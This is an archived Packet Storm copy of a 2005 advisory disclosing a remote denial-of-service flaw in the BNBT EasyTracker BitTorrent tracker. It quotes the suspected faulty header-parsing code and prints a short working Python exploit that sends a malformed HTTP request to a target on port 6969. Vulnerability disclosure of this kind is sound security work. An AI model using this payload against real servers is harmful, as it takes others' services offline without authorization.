what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

AD20050830.txt

AD20050830.txt
Posted Aug 31, 2005
Authored by Sowhat | Site secway.org

BNBT EasyTracker is susceptible to a remote denial of service vulnerability when accepting a malformed HTTP request. Demonstration exploit provided. Versions 7.7r3.2004.10.27 and below are affected.

tags | exploit, remote, web, denial of service
SHA-256 | f9291b23377db55f3b2c53e515326c7b8ac550f848e8a637eecb137eee6a7662

AD20050830.txt

Change Mirror Download
------=_Part_1314_25115579.1125371502728
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

BNBT EasyTracker Remote Denial of Service Vulnerability

by Sowhat

Last Update:2005.08.30

http://secway.org/advisory/AD20050830.txt

Vendor:

http://bnbteasytracker.sourceforge.net/

Product Affected:

7.7r3.2004.10.27 and below

Overview:

BNBT was written by Trevor Hogan. BNBT is a complete port=20
of the original Python BitTorrent tracker to C++ for speed
and efficiency. BNBT also offers many additional features
beyond the original Python BitTorrent tracker, plus it's=20
easy to use and customizable. BNBT is covered under the GNU
Lesser General Public License (LGPL).

A Denial of Service vulnerability exists within BNBT which
allows for an attacker to cause the BNBT to stop responding.=20

Details:

A specifically crafted HTTP request will cause the BNBT=20
Server stop responding.

Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
will reproduce the problem. It seems that the bug is located
in client.cpp, "//grab headers" section. And it is something
like " 1-2 =3D -1" and similar to memcpy(-1) ?=20

// grab headers

string :: size_type iNewLine =3D m_strReceiveBuf.find( "\r\n" );
string :: size_type iDoubleNewLine =3D m_strReceiveBuf.find( "\r\n\r\n" );

strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),=20
iDoubleNewLine - iNewLine - strlen( "\r\n" ) );

while( 1 )
{
string :: size_type iSplit =3D strTemp.find( ":" );
string :: size_type iEnd =3D strTemp.find( "\r\n" );

if( iSplit =3D=3D string :: npos )
{
UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );

break;
}

string strKey =3D strTemp.substr( 0, iSplit );
string strValue =3D strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit =
-=20
strlen( "\r\n" ) );//Bug here ??

rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );

strTemp =3D strTemp.substr( iEnd + strlen( "\r\n" ) );

if( iEnd =3D=3D string :: npos )
break;
}

However, I am not quite sure about that and it seems that
it is only a D.O.S so I havnt deep into it.=20
=20
Exploit:

//BNBTDOS.py
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discoverd and coded by Sowhat
# http://secway.org

# Version 7.7r3.2004.10.27 and below
# the BNBT project: http://bnbteasytracker.sourceforge.net/

import sys
import string
import socket

if (len(sys.argv) !=3D 2):
print "\nUsage: " + sys.argv[0] + " TargetIP\n"
print "##################################################################"
print "# #"
print "# BNBT EasyTracker Remote D.O.S Exploit #"
print "# Bug discoverd and coded by Sowhat #"
print "# http://secway.org #"
print "##################################################################"
sys.exit(0)

host =3D sys.argv[1]
port =3D 6969


payload =3D "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"

s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
s.send(payload)


WORKAROUND:

No WORKAROUND this time.
plz check the vendor's website for update
Maybe there will be a patch later (?)

Vendor Response:

2005.08.22 Vendor notified via Webform,no email found=20
2005.08.30 Vendor no response. Advisory Released

"Life is like a bug, Do you know how to exploit it ?"

------=_Part_1314_25115579.1125371502728
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

<p>BNBT EasyTracker Remote Denial of Service Vulnerability</p>
<p>by Sowhat</p>
<p>Last Update:2005.08.30</p>
<p><a href=3D"http://secway.org/advisory/AD20050830.txt">http://secway.org/=
advisory/AD20050830.txt</a></p>
<p>Vendor:</p>
<p><a href=3D"http://bnbteasytracker.sourceforge.net/">http://bnbteasytrack=
er.sourceforge.net/</a></p>
<p>Product Affected:</p>
<p>7.7r3.2004.10.27 and below</p>
<p>Overview:</p>
<p>BNBT was written by Trevor Hogan. BNBT is a complete port <br>of the ori=
ginal Python BitTorrent tracker to C++ for speed<br>and efficiency. BNBT al=
so offers many additional features<br>beyond the original Python BitTorrent=
tracker, plus it's=20
<br>easy to use and customizable. BNBT is covered under the GNU<br>&nbsp;Le=
sser General Public License (LGPL).</p>
<p>A Denial of Service vulnerability exists within BNBT which<br>allows for=
an attacker to cause the BNBT to stop responding. </p>
<p>Details:</p>
<p>A specifically crafted HTTP request will cause the BNBT <br>Server stop =
responding.</p>
<p>Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"<=
br>will reproduce the problem. It seems that the bug is located<br>in clien=
t.cpp, "//grab headers" section. And it is something<br>like &quo=
t; 1-2 =3D -1" and similar to memcpy(-1) ?=20
</p>
<p>// grab headers</p>
<p>&nbsp;string :: size_type iNewLine =3D m_strReceiveBuf.find( "\r\n&=
quot; );<br>&nbsp;string :: size_type iDoubleNewLine =3D m_strReceiveBuf.fi=
nd( "\r\n\r\n" );</p>
<p>&nbsp;strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( "\r\n&=
quot; ), iDoubleNewLine - iNewLine - strlen( "\r\n" ) );</p>
<p>&nbsp;while( 1 )<br>&nbsp;{<br>&nbsp;&nbsp;string :: size_type iSplit =
=3D strTemp.find( ":" );<br>&nbsp;&nbsp;string :: size_type iEnd =
=3D strTemp.find( "\r\n" );</p>
<p>&nbsp;&nbsp;if( iSplit =3D=3D string :: npos )<br>&nbsp;&nbsp;{<br>&nbsp=
;&nbsp;&nbsp;UTIL_LogPrint( "client warning - malformed HTTP request (=
bad header)\n" );</p>
<p>&nbsp;&nbsp;&nbsp;break;<br>&nbsp;&nbsp;}</p>
<p>&nbsp;&nbsp;string strKey =3D strTemp.substr( 0, iSplit );<br>&nbsp;&nbs=
p;string strValue =3D strTemp.substr( iSplit + strlen( ": " ), iE=
nd - iSplit - strlen( "\r\n" ) );//Bug here ??</p>
<p>&nbsp;&nbsp;rqst.mapHeaders.insert( pair<string, string>( strKey, =
strValue ) );</p>
<p>&nbsp;&nbsp;strTemp =3D strTemp.substr( iEnd + strlen( "\r\n" =
) );</p>
<p>&nbsp;&nbsp;if( iEnd =3D=3D string :: npos )<br>&nbsp;&nbsp;&nbsp;break;=
<br>&nbsp;}</p>
<p>However, I am not quite sure about that and it seems that<br>it is only =
a D.O.S so I havnt deep into it. <br>&nbsp;</p>
<p>Exploit:</p>
<p>//BNBTDOS.py<br># BNBT EasyTracker Remote D.O.S Exploit<br># Bug discove=
rd and coded by Sowhat<br># <a href=3D"http://secway.org/">http://secway.or=
g</a></p>
<p># Version 7.7r3.2004.10.27 and below<br># the BNBT project:&nbsp; <a hre=
f=3D"http://bnbteasytracker.sourceforge.net/">http://bnbteasytracker.source=
forge.net/</a><br>&nbsp;<br>import sys<br>import string<br>import socket</p=
>
<p>if (len(sys.argv) !=3D 2):<br>&nbsp;print "\nUsage: " + sys.ar=
gv[0] + " TargetIP\n"<br>&nbsp;print "######################=
############################################"<br>&nbsp;print "#&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
; #"
<br>&nbsp;print "#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p; BNBT EasyTracker Remote D.O.S Exploit&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #"<br>&n=
bsp;print "#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p; Bug discoverd and coded by Sowhat&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
#"<br>&nbsp;print "#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href=3D"http://secway.org/">
http://secway.org</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #"<br>=
&nbsp;print "#########################################################=
#########"<br>&nbsp;sys.exit(0)</p>
<p>host =3D sys.argv[1]<br>port =3D 6969</p>
<p><br>payload&nbsp; =3D "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"</=
p>
<p>s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM)<br>s.connect((hos=
t,port))<br>s.send(payload)</p>
<p><br>WORKAROUND:</p>
<p>No WORKAROUND this time.<br>plz check the vendor's website for update<br=
>Maybe there will be a patch later (?)</p>
<p>Vendor Response:</p>
<p>2005.08.22 Vendor notified via Webform,no email found <br>2005.08.30 Ven=
dor no response. Advisory Released</p>
<p>"Life is like a bug, Do you know how to exploit it ?"</p>
<p><br>&nbsp;</p>

------=_Part_1314_25115579.1125371502728--
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close